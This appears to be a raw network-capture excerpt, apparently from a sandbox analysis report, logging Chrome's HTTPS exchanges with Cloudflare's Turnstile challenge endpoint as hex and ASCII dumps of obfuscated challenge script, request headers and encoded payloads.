                                                    2024-11-25 18:43:59 UTC1369INData Raw: 29 5d 5b 67 50 28 31 35 34 32 29 5d 28 67 50 28 31 30 38 31 29 2c 64 29 29 3b 72 65 74 75 72 6e 21 5b 5d 7d 2c 65 51 3d 30 2c 65 54 3d 7b 7d 2c 65 54 5b 67 4a 28 34 37 31 29 5d 3d 65 53 2c 65 4d 5b 67 4a 28 31 35 31 32 29 5d 3d 65 54 2c 65 56 3d 65 4d 5b 67 4a 28 33 31 33 29 5d 5b 67 4a 28 34 36 33 29 5d 5b 67 4a 28 36 38 36 29 5d 2c 65 57 3d 65 4d 5b 67 4a 28 33 31 33 29 5d 5b 67 4a 28 34 36 33 29 5d 5b 67 4a 28 31 30 36 37 29 5d 2c 65 58 3d 65 4d 5b 67 4a 28 33 31 33 29 5d 5b 67 4a 28 34 36 33 29 5d 5b 67 4a 28 33 32 37 29 5d 2c 66 39 3d 21 5b 5d 2c 66 6c 3d 75 6e 64 65 66 69 6e 65 64 2c 65 4d 5b 67 4a 28 31 30 36 34 29 5d 28 67 4a 28 38 31 37 29 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 68 47 2c 64 2c 65 29 7b 68 47 3d 67 4a 2c 64 3d 7b 27 79 53 4e 78 59 27
                                                    Data Ascii: )][gP(1542)](gP(1081),d));return![]},eQ=0,eT={},eT[gJ(471)]=eS,eM[gJ(1512)]=eT,eV=eM[gJ(313)][gJ(463)][gJ(686)],eW=eM[gJ(313)][gJ(463)][gJ(1067)],eX=eM[gJ(313)][gJ(463)][gJ(327)],f9=![],fl=undefined,eM[gJ(1064)](gJ(817),function(c,hG,d,e){hG=gJ,d={'ySNxY'
                                                    2024-11-25 18:43:59 UTC1369INData Raw: 27 2c 66 54 5b 67 4a 28 33 34 31 29 5d 3d 27 7a 27 2c 66 54 5b 67 4a 28 38 39 38 29 5d 3d 27 6e 27 2c 66 54 5b 67 4a 28 31 32 30 30 29 5d 3d 27 49 27 2c 66 54 5b 67 4a 28 31 30 38 38 29 5d 3d 27 62 27 2c 66 55 3d 66 54 2c 65 4d 5b 67 4a 28 35 37 32 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 67 2c 68 2c 69 2c 6a 2c 69 74 2c 6f 2c 78 2c 42 2c 43 2c 44 2c 45 2c 46 29 7b 69 66 28 69 74 3d 67 4a 2c 6f 3d 7b 27 49 59 6e 50 46 27 3a 69 74 28 31 31 38 34 29 2c 27 73 61 4b 53 5a 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 3c 48 7d 2c 27 77 63 4d 79 6c 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 48 3d 3d 3d 47 7d 2c 27 62 4b 65 64 79 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 28 48 29 7d 2c
                                                    Data Ascii: ',fT[gJ(341)]='z',fT[gJ(898)]='n',fT[gJ(1200)]='I',fT[gJ(1088)]='b',fU=fT,eM[gJ(572)]=function(g,h,i,j,it,o,x,B,C,D,E,F){if(it=gJ,o={'IYnPF':it(1184),'saKSZ':function(G,H){return G<H},'wcMyl':function(G,H){return H===G},'bKedy':function(G,H){return G(H)},
                                                    2024-11-25 18:43:59 UTC1369INData Raw: 29 7b 66 6f 72 28 6f 3d 30 3b 6f 3c 69 5b 6c 5b 6d 5d 5d 5b 69 77 28 35 35 37 29 5d 3b 6b 5b 69 77 28 32 36 38 29 5d 28 2d 31 2c 68 5b 6e 5d 5b 69 77 28 39 33 35 29 5d 28 69 5b 6c 5b 6d 5d 5d 5b 6f 5d 29 29 26 26 28 66 5a 28 69 5b 6c 5b 6d 5d 5d 5b 6f 5d 29 7c 7c 68 5b 6e 5d 5b 69 77 28 38 33 33 29 5d 28 27 6f 2e 27 2b 69 5b 6c 5b 6d 5d 5d 5b 6f 5d 29 29 2c 6f 2b 2b 29 3b 7d 65 6c 73 65 20 68 5b 6e 5d 3d 69 5b 6c 5b 6d 5d 5d 5b 69 77 28 31 34 35 38 29 5d 28 66 75 6e 63 74 69 6f 6e 28 73 2c 69 78 2c 78 29 7b 69 66 28 69 78 3d 69 77 2c 6b 5b 69 78 28 33 39 30 29 5d 28 6b 5b 69 78 28 37 38 32 29 5d 2c 69 78 28 37 39 35 29 29 29 7b 66 6f 72 28 69 5b 69 78 28 31 31 33 34 29 5d 28 29 2c 78 3d 30 3b 78 3c 6a 5b 69 78 28 35 35 37 29 5d 3b 6b 5b 78 5d 3d 3d 3d 73
                                                    Data Ascii: ){for(o=0;o<i[l[m]][iw(557)];k[iw(268)](-1,h[n][iw(935)](i[l[m]][o]))&&(fZ(i[l[m]][o])||h[n][iw(833)]('o.'+i[l[m]][o])),o++);}else h[n]=i[l[m]][iw(1458)](function(s,ix,x){if(ix=iw,k[ix(390)](k[ix(782)],ix(795))){for(i[ix(1134)](),x=0;x<j[ix(557)];k[x]===s
                                                    2024-11-25 18:43:59 UTC1369INData Raw: 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2b 69 7d 2c 27 64 7a 78 56 6b 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2d 69 7d 2c 27 44 46 45 43 68 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3e 69 7d 2c 27 61 5a 68 45 70 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 68 7d 2c 27 6a 62 4d 4a 53 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 4e 6a 6a 6a 41 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 21 3d 3d 68 7d 2c 27 52 67 74 53 58 27 3a 6a 53 28 35 37 36 29 2c 27 6e 58 68 62 78 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 3c 69 7d 2c 27 49 75 48 69 4c 27 3a 66
                                                    Data Ascii: ion(h,i){return h+i},'dzxVk':function(h,i){return h-i},'DFECh':function(h,i){return h>i},'aZhEp':function(h,i){return i==h},'jbMJS':function(h,i){return h(i)},'NjjjA':function(h,i){return i!==h},'RgtSX':jS(576),'nXhbx':function(h,i){return h<<i},'IuHiL':f
                                                    2024-11-25 18:43:59 UTC1369INData Raw: 30 29 2c 4f 3d 64 5b 6a 55 28 31 33 36 38 29 5d 28 46 2c 4e 29 2c 4f 62 6a 65 63 74 5b 6a 55 28 35 31 38 29 5d 5b 6a 55 28 39 38 38 29 5d 5b 6a 55 28 37 35 30 29 5d 28 44 2c 4f 29 29 46 3d 4f 3b 65 6c 73 65 7b 69 66 28 4f 62 6a 65 63 74 5b 6a 55 28 35 31 38 29 5d 5b 6a 55 28 39 38 38 29 5d 5b 6a 55 28 37 35 30 29 5d 28 45 2c 46 29 29 7b 69 66 28 32 35 36 3e 46 5b 6a 55 28 31 34 37 30 29 5d 28 30 29 29 7b 66 6f 72 28 43 3d 30 3b 43 3c 49 3b 4b 3c 3c 3d 31 2c 4c 3d 3d 64 5b 6a 55 28 34 30 31 29 5d 28 6f 2c 31 29 3f 28 4c 3d 30 2c 4a 5b 6a 55 28 38 33 33 29 5d 28 73 28 4b 29 29 2c 4b 3d 30 29 3a 4c 2b 2b 2c 43 2b 2b 29 3b 66 6f 72 28 50 3d 46 5b 6a 55 28 31 34 37 30 29 5d 28 30 29 2c 43 3d 30 3b 64 5b 6a 55 28 36 35 31 29 5d 28 38 2c 43 29 3b 4b 3d 4b 3c 3c
                                                    Data Ascii: 0),O=d[jU(1368)](F,N),Object[jU(518)][jU(988)][jU(750)](D,O))F=O;else{if(Object[jU(518)][jU(988)][jU(750)](E,F)){if(256>F[jU(1470)](0)){for(C=0;C<I;K<<=1,L==d[jU(401)](o,1)?(L=0,J[jU(833)](s(K)),K=0):L++,C++);for(P=F[jU(1470)](0),C=0;d[jU(651)](8,C);K=K<<


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    18192.168.2.449759104.18.94.414432200C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-25 18:43:59 UTC1174OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/717006795:1732559173:kR_0HaZjcMZ7NfcZjqJuMDbFTXd9SIuUQzr_to9VflA/8e83c97ff9621a48/QWQsdJI..ng.S_E0NSLTwx4vMMqFdMlyiLvXMg2W.bA-1732560235-1.1.1.1-tyv.fmORLOP0o6ZDwUZKHTQB_0sn6fnqojbSmrY7nOw7eNcPKLaZ4jJdNlCOZxav HTTP/1.1
                                                    Host: challenges.cloudflare.com
                                                    Connection: keep-alive
                                                    Content-Length: 3800
                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                    Content-type: application/x-www-form-urlencoded
                                                    CF-Chl-RetryAttempt: 0
                                                    sec-ch-ua-mobile: ?0
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                    CF-Challenge: QWQsdJI..ng.S_E0NSLTwx4vMMqFdMlyiLvXMg2W.bA-1732560235-1.1.1.1-tyv.fmORLOP0o6ZDwUZKHTQB_0sn6fnqojbSmrY7nOw7eNcPKLaZ4jJdNlCOZxav
                                                    sec-ch-ua-platform: "Windows"
                                                    Accept: */*
                                                    Origin: https://challenges.cloudflare.com
                                                    Sec-Fetch-Site: same-origin
                                                    Sec-Fetch-Mode: cors
                                                    Sec-Fetch-Dest: empty
                                                    Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/a7tsf/0x4AAAAAAADnPIDROrmt1Wwj/light/fbE/normal/auto/
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.9
                                                    2024-11-25 18:43:59 UTC3800OUTData Raw: 76 5f 38 65 38 33 63 39 37 66 66 39 36 32 31 61 34 38 3d 62 63 47 6b 54 6b 56 24 41 79 5a 36 47 55 63 67 64 56 58 32 58 4e 58 71 6b 67 57 58 63 4b 6c 56 5a 4e 4b 58 64 77 58 41 4b 58 74 72 4f 58 37 33 37 58 64 75 43 67 5a 52 58 79 37 35 77 75 67 58 4f 43 58 6e 67 41 61 58 6f 57 5a 79 75 65 6b 4c 58 58 37 58 64 63 49 58 6a 6b 55 4f 4b 30 48 67 41 25 32 62 44 72 65 65 51 38 5a 32 58 5a 57 76 43 58 37 2d 67 5a 45 55 48 79 6e 4c 75 24 7a 65 57 55 49 76 6c 69 4a 31 64 41 30 49 6c 6b 41 24 58 62 75 58 76 76 57 71 47 58 5a 32 58 4c 63 58 79 76 4c 69 79 52 67 58 4a 4b 57 61 5a 76 5a 39 78 33 57 64 76 73 78 43 69 62 52 68 47 47 47 58 31 76 73 67 52 58 58 36 48 32 5a 36 6a 24 7a 24 46 37 41 48 75 78 53 77 58 4b 47 58 52 6c 46 4c 61 64 58 58 2b 33 37 59 58 6e 4c 6b
                                                    Data Ascii: v_8e83c97ff9621a48=bcGkTkV$AyZ6GUcgdVX2XNXqkgWXcKlVZNKXdwXAKXtrOX737XduCgZRXy75wugXOCXngAaXoWZyuekLXX7XdcIXjkUOK0HgA%2bDreeQ8Z2XZWvCX7-gZEUHynLu$zeWUIvliJ1dA0IlkA$XbuXvvWqGXZ2XLcXyvLiyRgXJKWaZvZ9x3WdvsxCibRhGGGX1vsgRXX6H2Z6j$z$F7AHuxSwXKGXRlFLadXX+37YXnLk
                                                    2024-11-25 18:44:00 UTC762INHTTP/1.1 200 OK
                                                    Date: Mon, 25 Nov 2024 18:44:00 GMT
                                                    Content-Type: text/plain; charset=UTF-8
                                                    Content-Length: 85840
                                                    Connection: close
                                                    cf-chl-gen: L7K/B0jbTTsCW/2Dlf6wbMCCwqFrurP4QviX3g/cXxbatDE9vJrll6VpyPxjDeFsR4rwF0pBxaV6so81D5elUZCfvWzY5dvQ0Z5njQCIvskTiIjUDP+I/rDgRk/87x06IfPOPXv1uU2oCmDuCJS6WV/shRJeIuBSWruk473BlkY9rut0eMV7lehJthIjE6EOKAbEHg2FyaBMQtTxfrd4l08dqDhhkpDiFmehjDaf5TbhMWoUHvDTeHLF4mHn8+A5JcUdkn68DNL4zr0tIu0Iic3SfnKBQES4eUnRa0ZEJfBj9xXgIWRrUXLaiDHt6c4BRt7eadqGi1pK76lM1258olEBz2/pvOJqdvGVvEoOaRTniCZ7H2bLbku6x1llJcb98DgmNrDPC+DelLOGlN4/c0aq9WAUJDHoV9Uh7k24KQLMwBapP1O35TnT78FX+jPzIlZ+4zy2thewB6qVDRv9S3/GGzkQvliYRoO0eBJK2oeYIKLnXR+TpAWvaNER/wmI$Le00RnBB7Nf4tTyK
                                                    Server: cloudflare
                                                    CF-RAY: 8e83c99ba974de92-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    2024-11-25 18:44:00 UTC607INData Raw: 6a 48 2b 46 66 49 69 52 53 58 74 61 68 4a 53 4f 68 4a 61 4d 6b 35 4e 4f 55 4b 4f 6d 5a 55 75 6a 6c 70 79 54 6e 36 68 67 6b 6f 39 6c 6b 33 52 66 6d 6d 46 32 58 4c 53 6e 72 61 53 77 75 58 47 6a 6f 48 65 6b 68 58 43 73 63 6f 64 74 62 6d 39 77 78 37 50 46 64 4c 53 35 76 62 65 38 77 73 65 37 77 4e 4c 58 67 4a 36 43 78 4e 62 4d 32 39 54 4e 31 39 37 65 78 35 33 4c 71 6e 71 52 6b 70 4f 55 36 39 66 70 6d 4f 7a 66 36 65 44 50 34 2f 44 31 35 76 58 33 70 4d 4b 6d 36 50 72 77 41 50 6a 78 2b 77 4d 44 36 38 4c 76 7a 70 36 66 74 72 65 34 75 51 51 43 76 4d 58 39 41 77 63 42 42 67 77 52 42 51 6f 63 49 64 63 63 39 42 38 58 2b 65 4c 51 37 75 2f 77 31 4f 58 66 31 7a 54 44 78 4e 76 63 33 64 37 66 34 4f 48 69 49 79 67 73 4a 69 73 78 4e 69 6f 76 51 55 62 75 44 66 42 4e 33 50 50
                                                    Data Ascii: jH+FfIiRSXtahJSOhJaMk5NOUKOmZUujlpyTn6hgko9lk3RfmmF2XLSnraSwuXGjoHekhXCscodtbm9wx7PFdLS5vbe8wse7wNLXgJ6CxNbM29TN197ex53LqnqRkpOU69fpmOzf6eDP4/D15vX3pMKm6PrwAPjx+wMD68Lvzp6ftre4uQQCvMX9AwcBBgwRBQocIdcc9B8X+eLQ7u/w1OXf1zTDxNvc3d7f4OHiIygsJisxNiovQUbuDfBN3PP
                                                    2024-11-25 18:44:00 UTC1369INData Raw: 47 56 69 78 54 47 68 30 45 58 45 39 56 54 46 68 68 47 55 74 51 56 45 35 54 57 56 35 53 59 32 56 71 4a 54 6c 4a 52 47 51 74 48 53 73 66 64 32 70 77 5a 33 4e 38 4e 47 5a 72 62 32 6c 75 64 48 6c 74 66 6f 43 46 51 47 79 45 69 6d 31 50 52 43 4d 36 4f 7a 77 39 50 6a 39 41 51 55 4a 44 52 45 57 51 6f 48 70 74 59 6d 56 4d 70 4a 65 64 6c 4b 43 70 59 5a 4f 59 6e 4a 61 62 6f 61 61 61 71 36 32 79 62 61 4f 4b 6c 71 79 78 71 70 6c 7a 55 6d 6c 71 61 32 78 74 62 6d 39 77 63 58 4a 7a 64 4a 6d 61 75 4b 71 52 6c 48 76 54 78 73 7a 44 7a 39 69 51 77 73 66 4c 78 63 72 51 31 63 6e 61 33 4f 47 63 33 4e 53 64 66 4a 4f 55 6c 5a 61 58 6d 4a 6d 61 6d 35 79 64 6e 73 48 4b 2b 76 47 7a 76 71 58 39 38 50 62 74 2b 51 4f 36 7a 39 67 4a 41 4d 47 2b 6e 5a 36 31 74 72 65 34 75 62 71 37 76 4c
                                                    Data Ascii: GVixTGh0EXE9VTFhhGUtQVE5TWV5SY2VqJTlJRGQtHSsfd2pwZ3N8NGZrb2ludHltfoCFQGyEim1PRCM6Ozw9Pj9AQUJDREWQoHptYmVMpJedlKCpYZOYnJaboaaaq62ybaOKlqyxqplzUmlqa2xtbm9wcXJzdJmauKqRlHvTxszDz9iQwsfLxcrQ1cna3OGc3NSdfJOUlZaXmJmam5ydnsHK+vGzvqX98Pbt+QO6z9gJAMG+nZ61tre4ubq7vL
                                                    2024-11-25 18:44:00 UTC1369INData Raw: 45 7a 42 4b 4e 55 35 41 48 68 6a 32 44 67 38 51 45 52 49 54 46 42 55 57 46 78 67 5a 4f 32 4a 74 59 6d 49 32 4f 69 46 35 62 48 4a 70 64 58 34 32 61 47 31 78 61 33 42 32 65 32 2b 41 67 6f 64 43 56 6e 32 49 66 58 31 52 52 79 59 39 50 6a 39 41 51 55 4a 44 52 45 56 47 52 30 69 4e 62 35 4e 74 59 47 68 50 70 35 71 67 6c 36 4f 73 5a 4a 61 62 6e 35 6d 65 70 4b 6d 64 72 72 43 31 63 4b 65 4a 72 59 64 36 64 46 4e 71 61 32 78 74 62 6d 39 77 63 58 4a 7a 64 48 57 72 76 5a 71 6c 71 49 2b 57 66 64 58 49 7a 73 58 52 32 70 4c 45 79 63 33 48 7a 4e 4c 58 79 39 7a 65 34 35 37 47 32 4c 58 41 77 36 71 6a 67 70 6d 61 6d 35 79 64 6e 70 2b 67 6f 61 4b 6a 70 4e 48 6e 33 63 71 39 78 4b 73 45 39 76 7a 7a 41 41 6e 41 38 76 66 37 39 66 6f 42 42 76 6b 4c 44 52 4c 4d 36 77 4c 33 35 4e 66
                                                    Data Ascii: EzBKNU5AHhj2Dg8QERITFBUWFxgZO2JtYmI2OiF5bHJpdX42aG1xa3B2e2+AgodCVn2IfX1RRyY9Pj9AQUJDREVGR0iNb5NtYGhPp5qgl6OsZJabn5mepKmdrrC1cKeJrYd6dFNqa2xtbm9wcXJzdHWrvZqlqI+WfdXIzsXR2pLEyc3HzNLXy9ze457G2LXAw6qjgpmam5ydnp+goaKjpNHn3cq9xKsE9vzzAAnA8vf79foBBvkLDRLM6wL35Nf
                                                    2024-11-25 18:44:00 UTC1369INData Raw: 77 77 4e 44 67 38 51 45 52 49 54 46 42 55 57 46 78 67 5a 47 6d 31 68 63 52 34 71 50 53 46 6f 64 58 4e 79 53 57 39 70 65 30 31 36 63 48 4a 52 63 48 4e 35 64 32 34 38 64 6f 69 4a 63 34 4a 2b 6b 33 6b 39 66 44 2b 4c 68 70 74 52 68 34 32 48 6d 57 75 59 6a 70 42 74 6f 56 61 59 6c 4b 6c 53 57 46 53 67 6d 37 43 45 6e 71 68 6b 5a 56 31 6a 58 33 4a 32 65 4b 42 2f 54 32 5a 6e 61 47 6c 71 61 32 78 74 62 6d 39 77 63 63 39 64 58 6e 56 32 64 33 68 35 65 6e 74 38 66 58 35 2f 67 4e 50 48 31 39 6e 58 31 49 66 4b 33 64 6e 4d 6c 4e 2f 54 34 35 6d 73 66 4a 4f 55 6c 5a 61 58 6d 4a 6d 61 2b 49 61 48 6e 70 2b 67 6f 61 4b 6a 70 4b 58 6c 36 75 37 6f 37 66 50 34 37 50 45 45 43 62 2f 33 42 74 76 64 33 38 2b 34 31 72 72 44 70 72 32 2b 76 38 44 42 77 73 50 45 78 63 62 48 79 41 34 61
                                                    Data Ascii: wwNDg8QERITFBUWFxgZGm1hcR4qPSFodXNySW9pe016cHJRcHN5d248doiJc4J+k3k9fD+LhptRh42HmWuYjpBtoVaYlKlSWFSgm7CEnqhkZV1jX3J2eKB/T2ZnaGlqa2xtbm9wcc9dXnV2d3h5ent8fX5/gNPH19nX1IfK3dnMlN/T45msfJOUlZaXmJma+IaHnp+goaKjpKXl6u7o7fP47PEECb/3Btvd38+41rrDpr2+v8DBwsPExcbHyA4a
                                                    2024-11-25 18:44:00 UTC1369INData Raw: 49 54 46 42 55 57 46 78 67 5a 58 6d 70 66 63 6d 74 6b 62 6e 55 77 5a 58 4e 70 66 7a 56 78 64 33 68 77 66 6c 56 69 58 46 77 39 48 44 4d 30 4e 54 59 33 4f 44 6b 36 4f 7a 77 39 50 6f 4f 50 68 4a 65 51 69 5a 4f 61 56 5a 43 4f 69 34 39 61 6b 4a 32 63 6f 4a 4b 6b 6d 48 69 6b 6d 61 79 6c 6e 71 69 76 6a 4b 79 78 71 4c 53 71 73 62 46 73 71 62 57 71 76 62 61 76 75 63 42 37 73 4c 36 30 79 6e 74 2f 58 6e 56 32 64 33 68 35 65 6e 74 38 66 58 35 2f 67 4e 6a 4c 30 63 6a 55 33 5a 58 48 7a 4e 44 4b 7a 39 58 61 7a 74 2f 68 35 71 47 34 34 4c 2f 4e 79 61 32 6f 37 50 48 69 38 50 6a 54 35 75 37 6f 35 2f 6e 31 2b 62 43 77 2f 51 41 47 2b 66 4f 32 75 62 2f 31 41 77 49 47 39 77 72 39 33 51 72 2b 45 67 73 45 44 68 58 78 45 68 63 4f 47 68 41 58 46 39 45 69 46 52 73 53 48 69 66 65 45
                                                    Data Ascii: ITFBUWFxgZXmpfcmtkbnUwZXNpfzVxd3hwflViXFw9HDM0NTY3ODk6Ozw9PoOPhJeQiZOaVZCOi49akJ2coJKkmHikmaylnqivjKyxqLSqsbFsqbWqvbavucB7sL60ynt/XnV2d3h5ent8fX5/gNjL0cjU3ZXHzNDKz9Xazt/h5qG44L/Nya2o7PHi8PjT5u7o5/n1+bCw/QAG+fO2ub/1AwIG9wr93Qr+EgsEDhXxEhcOGhAXF9EiFRsSHifeE
                                                    2024-11-25 18:44:00 UTC1369INData Raw: 77 4b 47 35 68 63 56 4a 6f 62 57 5a 78 65 48 67 74 62 48 78 32 62 48 35 30 65 33 73 32 4f 44 43 4d 48 44 4d 30 4e 54 59 33 4f 44 6b 36 4f 7a 77 39 50 6a 39 41 51 55 4a 44 52 45 56 47 6e 59 6d 62 53 70 43 65 6e 35 32 68 65 5a 2b 59 6f 6f 4f 58 6f 4a 79 62 72 56 70 34 58 4c 53 6e 72 61 53 77 75 58 47 58 74 37 6d 78 66 48 47 76 77 62 47 37 77 6e 33 43 74 72 50 47 77 38 4e 2f 6b 6d 4a 35 65 6e 74 38 66 58 35 2f 67 49 47 43 67 34 53 46 68 6f 65 49 69 59 71 4c 6a 4f 54 58 33 64 54 67 36 61 48 45 36 73 76 71 72 61 48 66 37 65 37 73 38 4d 6a 75 35 2f 48 53 35 75 2f 72 36 76 79 31 71 75 37 30 38 41 4d 49 76 4c 47 35 43 51 66 43 2f 76 67 48 2f 51 63 42 44 38 54 48 32 71 72 42 77 73 50 45 78 63 62 48 79 4d 6e 4b 79 38 7a 4e 7a 73 2f 51 4c 39 37 54 35 65 58 66 38 73
                                                    Data Ascii: wKG5hcVJobWZxeHgtbHx2bH50e3s2ODCMHDM0NTY3ODk6Ozw9Pj9AQUJDREVGnYmbSpCen52heZ+YooOXoJybrVp4XLSnraSwuXGXt7mxfHGvwbG7wn3CtrPGw8N/kmJ5ent8fX5/gIGCg4SFhoeIiYqLjOTX3dTg6aHE6svqraHf7e7s8Mju5/HS5u/r6vy1qu708AMIvLG5CQfC/vgH/QcBD8TH2qrBwsPExcbHyMnKy8zNzs/QL97T5eXf8s
                                                    2024-11-25 18:44:00 UTC1369INData Raw: 62 6d 56 6e 65 31 4e 72 4c 6e 70 39 61 33 31 2f 66 6e 5a 38 64 6a 6b 78 55 44 4e 42 52 6a 2b 53 49 69 4d 36 4f 7a 77 39 50 6a 39 41 51 55 4a 44 52 45 57 50 6a 56 43 67 6b 35 6d 51 6e 4b 56 64 71 5a 57 4a 70 6d 70 6a 67 71 61 4b 71 34 35 72 5a 47 53 74 72 37 43 77 74 4c 65 35 73 36 2b 36 76 4c 4b 74 65 4b 2b 38 76 4d 4f 35 76 38 65 30 79 4c 37 46 78 58 2b 43 67 33 76 58 5a 33 35 2f 67 49 47 43 67 34 53 46 68 6f 65 49 69 59 71 4c 6a 49 33 6c 32 4e 37 56 34 65 71 69 36 4e 76 72 7a 4f 4c 6e 34 4f 76 79 38 71 66 6d 39 76 44 6d 2b 4f 37 31 39 62 43 79 71 67 65 57 72 61 36 76 73 4c 47 79 73 37 53 31 74 72 65 34 75 62 71 37 76 4c 32 2b 76 38 41 5a 44 42 49 4a 46 52 37 56 43 76 4d 44 2f 4e 7a 56 31 2b 71 36 30 64 4c 54 31 4e 58 57 31 39 6a 5a 32 74 76 63 33 64 37
                                                    Data Ascii: bmVne1NrLnp9a31/fnZ8djkxUDNBRj+SIiM6Ozw9Pj9AQUJDREWPjVCgk5mQnKVdqZWJpmpjgqaKq45rZGStr7CwtLe5s6+6vLKteK+8vMO5v8e0yL7FxX+Cg3vXZ35/gIGCg4SFhoeIiYqLjI3l2N7V4eqi6NvrzOLn4Ovy8qfm9vDm+O719bCyqgeWra6vsLGys7S1tre4ubq7vL2+v8AZDBIJFR7VCvMD/NzV1+q60dLT1NXW19jZ2tvc3d7
                                                    2024-11-25 18:44:00 UTC1369INData Raw: 6b 51 6f 62 33 39 35 62 34 46 33 66 6e 34 35 4f 7a 4f 50 48 7a 59 33 4f 44 6b 36 4f 7a 77 39 6c 59 65 4a 6a 59 64 4c 53 35 47 50 6a 59 31 4a 6b 5a 71 52 6f 45 36 65 6e 6c 68 62 50 56 52 56 56 6c 64 59 57 56 70 62 58 46 31 65 58 37 4f 34 71 37 65 6e 72 57 36 6d 6f 36 69 6c 66 4b 6d 71 64 32 2f 4c 57 33 4a 7a 64 48 56 32 64 33 68 35 65 6e 74 38 66 58 35 2f 67 49 48 46 78 4e 66 4b 6a 63 72 4d 31 36 2f 56 6e 70 53 6f 65 5a 43 52 6b 70 4f 63 32 2b 76 6c 32 2b 33 6a 36 75 71 6c 70 35 2f 37 69 34 79 4e 70 4b 57 6d 70 36 69 70 71 71 73 44 37 67 47 76 38 2f 6e 2b 39 67 6b 4f 74 74 53 34 2b 50 30 43 2b 77 45 48 44 41 41 46 46 78 77 41 42 51 6f 4f 43 41 30 54 47 41 77 52 49 79 6a 65 49 2f 73 6d 48 67 48 70 46 66 50 44 32 74 76 63 33 64 37 66 34 4f 45 35 4a 54 66 6c
                                                    Data Ascii: kQob395b4F3fn45OzOPHzY3ODk6Ozw9lYeJjYdLS5GPjY1JkZqRoE6enlhbPVRVVldYWVpbXF1eX7O4q7enrW6mo6ilfKmqd2/LW3JzdHV2d3h5ent8fX5/gIHFxNfKjcrM16/VnpSoeZCRkpOc2+vl2+3j6uqlp5/7i4yNpKWmp6ipqqsD7gGv8/n+9gkOttS4+P0C+wEHDAAFFxwABQoOCA0TGAwRIyjeI/smHgHpFfPD2tvc3d7f4OE5JTfl
                                                    2024-11-25 18:44:00 UTC1369INData Raw: 74 79 64 48 5a 36 67 48 68 34 55 48 39 39 51 49 39 44 6a 59 47 52 6b 35 47 4f 51 5a 52 52 68 35 53 55 69 6f 6d 64 55 71 46 56 61 4b 43 55 70 4b 61 6b 6f 56 53 6e 73 35 71 5a 72 5a 32 6a 5a 4c 52 6e 75 72 4b 6d 74 72 69 32 73 32 61 35 78 63 5a 32 70 71 6c 32 69 63 47 31 78 63 66 46 77 6e 57 58 79 63 71 36 30 34 6e 43 7a 38 33 4d 69 4d 2f 48 32 6f 53 34 79 39 75 51 32 70 4f 55 36 64 4f 63 30 4d 50 70 33 4e 57 6d 73 75 54 59 37 75 4c 68 33 50 44 73 38 4b 33 73 34 76 44 71 2b 65 62 74 37 4c 54 76 75 4e 30 43 34 4f 6a 43 7a 51 44 7a 43 76 33 38 39 77 77 49 44 4d 67 49 2f 51 77 47 46 51 49 4a 43 42 66 51 44 4e 51 59 2b 52 72 79 46 74 7a 71 46 74 66 5a 33 52 6e 68 2f 43 59 48 45 75 2f 32 4d 69 55 72 49 69 34 33 37 69 45 6d 4b 69 51 70 4c 7a 51 6f 4f 54 74 41 2b
                                                    Data Ascii: tydHZ6gHh4UH99QI9DjYGRk5GOQZRRh5SUiomdUqFVaKCUpKakoVSns5qZrZ2jZLRnurKmtri2s2a5xcZ2pql2icG1xcfFwnWXycq604nCz83MiM/H2oS4y9uQ2pOU6dOc0MPp3NWmsuTY7uLh3PDs8K3s4vDq+ebt7LTvuN0C4OjCzQDzCv389wwIDMgI/QwGFQIJCBfQDNQY+RryFtzqFtfZ3Rnh/CYHEu/2MiUrIi437iEmKiQpLzQoOTtA+


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    19192.168.2.449764104.18.95.414432200C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-25 18:44:02 UTC598OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/717006795:1732559173:kR_0HaZjcMZ7NfcZjqJuMDbFTXd9SIuUQzr_to9VflA/8e83c97ff9621a48/QWQsdJI..ng.S_E0NSLTwx4vMMqFdMlyiLvXMg2W.bA-1732560235-1.1.1.1-tyv.fmORLOP0o6ZDwUZKHTQB_0sn6fnqojbSmrY7nOw7eNcPKLaZ4jJdNlCOZxav HTTP/1.1
                                                    Host: challenges.cloudflare.com
                                                    Connection: keep-alive
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                    Accept: */*
                                                    Sec-Fetch-Site: none
                                                    Sec-Fetch-Mode: cors
                                                    Sec-Fetch-Dest: empty
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.9
